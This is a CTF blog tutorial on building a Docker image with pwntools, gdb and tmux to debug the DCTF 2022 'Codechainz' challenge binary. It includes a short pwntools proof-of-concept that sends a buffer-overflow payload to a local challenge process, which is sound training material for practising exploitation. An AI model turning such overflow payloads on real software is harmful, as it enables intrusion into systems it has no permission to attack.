Written by shakuganz

Use DockerFile for debugging with Pwntools

Hi everyone! This article will be on setting up DockerFile for debugging with Pwntools. This may be useful for you during CTF challenges. In the example below, I will be using an example from DCTF 2022 Codechainz. The “app” binary I am using can be downloaded from here. Let’s get started!

Setup image from DockerFile

Firstly, we will need to modify our DockerFile to install other tools required for debugging the program. I also modified the location of flag.txt and app file. Remember to create a fake flag.txt first with any values you want. I modified the DockerFile (those in the cyan color) as it is better for us to install the required tools during the building of the image. Otherwise, when we only install it when running the Docker image, the installed tools will be lost once we exit the Docker image process. This is time-consuming to reinstall the required tools.

FROM ubuntu:20.04

EXPOSE 1337

RUN export DEBIAN_FRONTEND=noninteractive && \
    apt-get -y update && \
    apt-get -y install socat coreutils && \
    apt-get -y install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential && \
    python3 -m pip install --upgrade pwntools && \
    apt-get -y install gdb && \
    apt-get -y install gdbserver && \
    apt-get -y install tmux

COPY chall/flag.txt /
COPY chall/app /

RUN chmod 555 /app && \
    chmod 444 /flag.txt

CMD socat -T 30 \
    TCP-LISTEN:1337,nodelay,reuseaddr,fork \
    EXEC:"stdbuf -i0 -o0 -e0 /app"

Next, let’s build the container using the DockerFile and run it. Copy and paste the following into your terminal and press ENTER.

sudo docker build -f Dockerfile -t ctfchall .
sudo docker run -it --rm --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -v $(pwd):/mnt ctfchall:latest

In another terminal, list the containers running and connect to it using tmux. We have to use tmux as pwntool’s gdb will spawn a new window. We can only use tmux for multiple windows in a Docker container.

kali@kali~$ sudo docker ps
[sudo] password for kali: 
CONTAINER ID   IMAGE             COMMAND                  CREATED         STATUS         PORTS      NAMES
1a6b1e6f4c9d   ctfchall:latest   "/bin/sh -c 'socat -…"   2 minutes ago   Up 2 minutes   1337/tcp   agitated_greider

kali@kali~$ sudo docker exec -i -t 1a6b1e6f4c9d /bin/tmux
root@1a6b1e6f4c9d:/#

Transfer file and start debugging

Now that we are in the Docker process, we can start another terminal and transfer our exploit file to the Docker image.

poc.py:

from pwn import *

context.terminal = ['tmux','splitw','-h']
context.arch = "amd64"

# for local debugging
r = process("./app")

gdb.attach(r)


# choose option 1 to go to BoF vulnerable page
r.sendlineafter(b'> ', b'1')

################## Craft payload ##################
s_offset_to_ret = 0x38
payload = s_offset_to_ret * b'A' + b'U'

log.info("Payload sent: " + str(payload))
# exploit the buffer overflow vulnerability
r.sendlineafter(b'> ', payload)

r.interactive()

Alternative poc.py:

from pwn import *

context.terminal = ['tmux','splitw','-h']
context.arch = "amd64"

r = gdb.debug("./app", "c")


# choose option 1 to go to BoF vulnerable page
r.sendlineafter(b'> ', b'1')

################## Craft payload ##################
s_offset_to_ret = 0x38
payload = s_offset_to_ret * b'A' + b'U'

log.info("Payload sent: " + str(payload))
# exploit the buffer overflow vulnerability
r.sendlineafter(b'> ', payload)

r.interactive()

Note that for alternative poc.py, we will need interactive so that the gdb won’t close immediately if the program crash. We will also need to “sudo apt-get install gdbserver”.

Finally, we can copy the exploit file to the Docker container.

kali@kali~$ sudo docker cp poc.py 1a6b1e6f4c9d:/poc.py

Cleanup

Once we finished the challenge, we would like to delete docker images to clear some spaces on our Linux system. Firstly, we will need to list the images available to know their ID before deleting the right image.

kali@kali~$ sudo docker images
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
ctfchall     latest    1a6b1e6f4c9d   1 minute ago  764MB
ubuntu       20.04     825d55fb6340   13 days ago   72.8MB

kali@kali~$ sudo docker image rm -f 1a6b1e6f4c9d
Untagged: ctfchall:latest
Deleted: sha256:962a1c8a1d7120adfef8b5dc1553f69846240bd72ba15b75f5e9e3bafd2b4396
Deleted: sha256:57052094e5b4fb5963c598571d3778c294633a06aac20780f4e32f64553781cd
Deleted: sha256:150683fe9cd843a0d2dca11afd7e9a3b593a2273d549c48328e44c05cf116731
Deleted: sha256:8dbdf9bd09bc16e6d86cbd81ff2b52e49c3382276595f75d9f15cd2d009d47e0
Deleted: sha256:fb25349a2946c78ed71a4c10d2da7b21c1effcfe55a77455f00f4a0611aa53bc
Deleted: sha256:d2f99a1bb8796dea5e55bdaddf7bd777bca3b943ac21a691192f83d4c5c612bb
Deleted: sha256:4cee141d38c8e1e5213c3167c62653a35637512dac9eebee311c45ae992e1efc
Deleted: sha256:f6e6981597b649b19027df43d70a7e878f629fb1f3c290b887878f4c043c0fc3
Deleted: sha256:3c6b30f9f97bd4d71cc7a6a56930cddcc0d437b74636c9ec6c33e7ee04c4c866
Deleted: sha256:099df7eea36245945d98275d99bda9b1d0494d291aadbca58002bb63b1844b22

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Advertisement

Leave a Reply

Please log in using one of these methods to post your comment:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.